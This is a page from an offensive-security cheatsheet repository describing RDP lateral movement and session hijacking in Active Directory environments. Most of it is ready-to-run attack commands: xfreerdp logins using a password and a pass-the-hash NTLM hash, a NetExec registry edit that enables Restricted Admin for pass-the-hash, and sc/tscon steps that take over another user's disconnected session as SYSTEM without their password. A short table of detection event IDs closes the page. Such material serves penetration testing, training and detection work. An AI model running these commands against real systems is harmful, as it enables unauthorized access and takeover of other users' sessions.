daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-56-rdp-lateral-movement-and-hijacking.md (3150B)


      1 ---
      2 title: "Attack #56 — RDP Lateral Movement and Hijacking"
      3 description: "RDP (Remote Desktop Protocol, port 3389) provides full GUI access to remote systems. Beyond standard RDP with credentials, attackers can hijack existing…"
      4 category: active-directory
      5 subcategory: "Lateral Movement"
      6 tags: ["active-directory", "lateral-movement", "hashing"]
      7 tools: ["NetExec", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Seven/⚫ Attack #56 — RDP Lateral Movement and Hijacking.md"
     11 ---
     12 # ⚫ Attack #56 — RDP Lateral Movement & Hijacking
     13 
     14 ***
     15 
     16 ## 📖 How It Works
     17 
     18 RDP (Remote Desktop Protocol, port 3389) provides full GUI access to remote systems. Beyond standard RDP with credentials, attackers can **hijack existing disconnected sessions** (session stealing) from a SYSTEM context without knowing the user's password — using `tscon.exe` to switch to another user's session.
     19 
     20 ***
     21 
     22 ## ⚙️ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Valid credentials or PtH** | For standard RDP |
     27 | **SYSTEM access on target** | For session hijacking |
     28 | **RDP enabled** | Port 3389 open |
     29 
     30 ***
     31 
     32 ## 💻 Full Commands
     33 
     34 ### 🔴 Standard RDP
     35 
     36 ```bash
     37 # ── From Linux ────────────────────────────────────────────────────────────────
     38 xfreerdp /u:Administrator /p:'Password1' /v:10.10.10.10 /cert-ignore /dynamic-resolution
     39 
     40 # ── PtH with RDP (Restricted Admin mode required) ────────────────────────────
     41 xfreerdp /u:Administrator /pth:2b576acbe6bcfda7294d6bd18041b8fe /v:10.10.10.10
     42 
     43 # ── Enable Restricted Admin (for PtH to work) ────────────────────────────────
     44 nxc smb 10.10.10.10 -u Administrator -H <hash> -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f'
     45 ```
     46 
     47 ### 🔴 RDP Session Hijacking
     48 
     49 ```powershell
     50 # ── As SYSTEM, list active sessions ───────────────────────────────────────────
     51 query user
     52 # USERNAME    SESSIONNAME   ID    STATE
     53 # admin_user  rdp-tcp#1     2     Disconnected  ← target this
     54 
     55 # ── Hijack disconnected session (as SYSTEM, no password needed) ───────────────
     56 # Create service to run tscon as SYSTEM:
     57 sc create sesshijack binPath= "cmd.exe /c tscon 2 /dest:console"
     58 net start sesshijack
     59 # Or directly as SYSTEM:
     60 tscon 2 /dest:console
     61 # You are now in admin_user's RDP session
     62 ```
     63 
     64 ***
     65 
     66 ## 🛡️ Detection — Event IDs
     67 
     68 | Event ID | Source | What to Look For |
     69 |---|---|---|
     70 | **4624** | Security Log | Logon Type 10 (RemoteInteractive) |
     71 | **4778** | Security Log | Session reconnected — session hijacking indicator |
     72 | **4779** | Security Log | Session disconnected |
     73 | **1149** | TerminalServices-RemoteConnectionManager | Remote connection established |
     74 
     75 ***
     76 
     77 > ✅ **Attack #56 — RDP Lateral Movement complete.**